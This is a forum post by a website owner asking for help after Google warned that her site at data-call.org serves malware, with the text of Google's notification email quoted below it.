Status
Not open for further replies.

Lydia

Hi All,

I was wondering if anyone could offer me some advise on this problem. Early this week we received a email from Google informing us that our web site is infected with malicious software. This has happened before and we made some changes to the source code which seemed to fix the problem. However the problem has arisen once again. I will post the email from Google in this thread. I am no expert on this kind of thing but I can tell anyone willing to help that we have contacted our server and they said the problem is not with them. Also our page was designed in India and the designers are of no help. We have also ran a virus scan and nothing has come up. I would appreciate any help you can offer or even if you can point me in the right direction. Below is a copy of the Google email and our web site.

Thanks in advance!
P.S I had to remove some URL's in order for me to be allowed to post the thread.
Dear site owner or webmaster of data-call. org,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

data-call .org data-call . org/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser